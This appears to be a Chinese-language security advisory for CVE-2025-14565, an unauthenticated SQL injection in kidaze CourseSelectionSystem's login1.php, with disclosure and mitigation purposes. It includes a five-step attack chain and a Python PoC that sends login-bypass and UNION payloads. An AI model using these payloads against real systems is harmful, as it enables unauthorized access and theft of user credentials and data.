CVE-2025-14565: kidaze CourseSelectionSystem login1.php SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-14565

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

kidaze CourseSelectionSystem

漏洞概述

CVE-2025-14565是存在于kidaze CourseSelectionSystem（课程选择系统）中的一个高危SQL注入漏洞。该漏洞存在于文件/Profilers/SProfile/login1.php中，攻击者可以通过操纵Username参数实现SQL注入攻击。由于该漏洞可远程利用且无需认证，攻击者可以在无需任何用户交互的情况下发起攻击，成功利用后可获取数据库中的敏感信息，包括用户凭据、个人数据等。该漏洞影响版本至提交42cd892b40a18d50bd4ed1905fa89f939173a464。由于该漏洞的利用代码已公开，攻击者可以轻松获取并使用，这大大增加了漏洞被利用的风险。建议受影响的用户尽快采取防护措施或升级到安全版本。

技术细节

该SQL注入漏洞出现在kidaze CourseSelectionSystem的登录模块中，具体位于Profilers/SProfile/login1.php文件。漏洞的根本原因是该文件在处理用户输入的Username参数时，未对用户输入进行充分的过滤和验证，直接将用户可控的输入拼接到SQL查询语句中。攻击者可以通过在Username字段中注入恶意的SQL代码片段，利用UNION SELECT、布尔盲注、时间盲注等技术从数据库中提取敏感信息。由于该登录页面通常不需要特殊权限即可访问，攻击者可以在互联网环境中远程利用此漏洞。CVSS 3.1评分7.3（高危）表明该漏洞对机密性、完整性和可用性都有一定影响。虽然各影响程度标注为低，但攻击者可通过SQL注入获取管理员账号密码，进而控制整个系统。

攻击链分析

STEP 1

步骤1

扫描识别目标系统：攻击者首先识别运行kidaze CourseSelectionSystem的Web服务器，确认login1.php端点存在

STEP 2

步骤2

构造恶意Payload：攻击者构造包含SQL注入代码的Username参数，如使用单引号、UNION语句或布尔盲注语法

STEP 3

步骤3

发送恶意请求：通过HTTP POST请求将构造的Payload发送给/login1.php端点，绕过登录验证

STEP 4

步骤4

提取数据库信息：利用UNION SELECT或盲注技术从数据库中提取用户表、密码哈希等敏感信息

STEP 5

步骤5

权限提升与持久化：使用获取的凭据登录后台管理系统，可能进一步获取服务器权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14565 SQL Injection PoC
# Target: kidaze CourseSelectionSystem /Profilers/SProfile/login1.php

def exploit_sqli(target_url):
    """
    SQL Injection exploit for CVE-2025-14565
    This PoC demonstrates blind SQL injection in Username parameter
    """
    # Normal login attempt (for comparison)
    normal_data = {
        'Username': 'admin',
        'Password': 'test'
    }
    
    # SQL Injection payloads
    # Boolean-based blind SQL injection
    payloads = [
        "admin' AND 1=1--",
        "admin' AND 1=2--",
        "admin' UNION SELECT NULL--",
        "admin' AND (SELECT COUNT(*) FROM users) > 0--"
    ]
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Testing SQL Injection vulnerability...")
    
    for payload in payloads:
        data = {
            'Username': payload,
            'Password': 'anything'
        }
        try:
            response = requests.post(target_url, data=data, timeout=10)
            print(f"[+] Payload: {payload}")
            print(f"    Status: {response.status_code}")
            print(f"    Length: {len(response.text)}")
        except requests.exceptions.RequestException as e:
            print(f"[-] Error: {e}")
    
    print("[*] Manual verification recommended")
    print("[*] Try: Username = ' OR 1=1 -- ")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = "http://target.com/Profilers/SProfile/login1.php"
    
    exploit_sqli(target)

影响范围

kidaze CourseSelectionSystem <= 42cd892b40a18d50bd4ed1905fa89f939173a464

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在Web应用层添加输入过滤，过滤单引号、分号等SQL特殊字符；2) 启用数据库查询日志监控，及时发现异常查询；3) 限制login1.php的访问来源IP；4) 临时关闭系统直到完成修复；5) 加强对数据库的访问控制，限制应用账户权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14565
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14565
3 Details https://www.cvedetails.com/cve/CVE-2025-14565/
4 VulDB https://vuldb.com/cve/CVE-2025-14565
5 Link https://github.com/Anti1i/cve/issues/1
6 Link https://vuldb.com/?ctiid.336189
7 Link https://vuldb.com/?id.336189
8 Link https://vuldb.com/?submit.703875
9 Link https://vuldb.com/?submit.725464